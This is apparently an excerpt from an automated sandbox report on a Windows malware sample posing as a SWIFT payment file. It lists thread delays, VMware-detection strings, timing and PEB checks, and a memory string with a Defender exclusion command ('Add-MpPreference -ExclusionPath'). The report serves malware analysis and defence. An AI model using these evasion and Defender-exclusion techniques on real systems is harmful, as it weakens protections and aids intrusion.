          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238812
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238703
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238593
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238483
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238375
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238265
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238150
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238045
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237937
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237499
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237390
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237281
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237171
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237062
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236952
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236843
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236734
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236625
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236515
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236406
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236296
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236152
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236046
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235937
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235500
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235390
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235281
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235141
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235031
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234913
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234797
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234682
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234553
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234391
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234250
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234140
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234012
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233898
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233750
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233640
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233529
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233421
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233312
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233203
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233093
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232980
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232865
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232687
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232535
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232395
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232268
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 230891
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 230122
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.308028352.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.302474555.000000000375F000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000B.00000000.266676869.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 0000000B.00000000.274705070.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 0000000B.00000000.330209660.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 0000000B.00000000.274705070.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01403D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01443540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0144A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01478DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01482073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01491074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0149740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0149740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0149740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01494015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01494015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01443884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01443884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0149070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0149070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0148131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CF358 mov eax, dword ptr fs:[00000030h]
